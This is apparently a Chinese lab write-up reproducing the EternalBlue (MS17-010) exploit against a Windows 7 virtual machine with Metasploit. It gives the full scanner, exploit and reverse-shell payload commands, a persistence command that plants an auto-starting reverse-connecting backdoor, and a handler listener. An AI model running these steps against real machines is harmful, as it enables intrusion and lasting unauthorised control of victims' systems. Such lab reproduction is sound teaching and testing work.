0%

永恒之蓝漏洞复现

前言

永恒之蓝是美国国家安全局开发的漏洞利用程序,该工具利用445/TCP端口的文件分享协议的漏洞进行传播。尽管微软与17年3月份就发布了该漏洞的补丁,然而并没有引起多大的重视,直到17年5月12日WannaCry勒索病毒爆发时,很多用户因未安装补丁而受害。

基本环境

  • Kali Linux (IP: 192.168.190.135)
  • Metasploit工具
  • 靶机,MSDN下载的win7 (IP: 192.168.190.136)

win7中开启文件共享

漏洞探测

先启动msfconsole,输入如下指令:

1
2
3
4
5
6
7
8
msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.190.136
RHOSTS => 192.168.190.136
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.190.136:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7600 x64 (64-bit)
[*] 192.168.190.136:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

从上述结果可知:该win7存在漏洞

开始攻击

执行如下指令:

1
2
3
4
5
6
7
8
9
10
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.190.135
LHOST => 192.168.190.135
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.190.136
RHOSTS => 192.168.190.136
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

第一行指令意思是加载Metasploit中的EternalBlue攻击模块,第四行是设置shell的通信类型,payload中装载的是漏洞利用成功后在目标机器上执行的代码

结果如下:

执行一下shell指令:

可以看到,我们已获得目标机器的最高权限的shell

权限维持

metasploit自带的留后门方式有两种:metsvc和persistence,但都有弊端,官方都不推荐使用,这里使用persistence试下

执行如下指令即可在目标机器中留一个后门:

1
meterpreter > run persistence -U -i 10 -p 4444 -r 192.168.190.135

其中:

  • -U:设置后门在用户登录后自启动。
  • -i:设置反向连接间隔时间,单位为秒。
  • -p:设置反向连接的端口号。
  • -r:设置反向连接的ip地址。

之后可以使用handler模块进行连接

1
2
3
4
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set LHOST 192.168.190.135
LHOST => 192.168.190.135
msf5 exploit(multi/handler) > exploit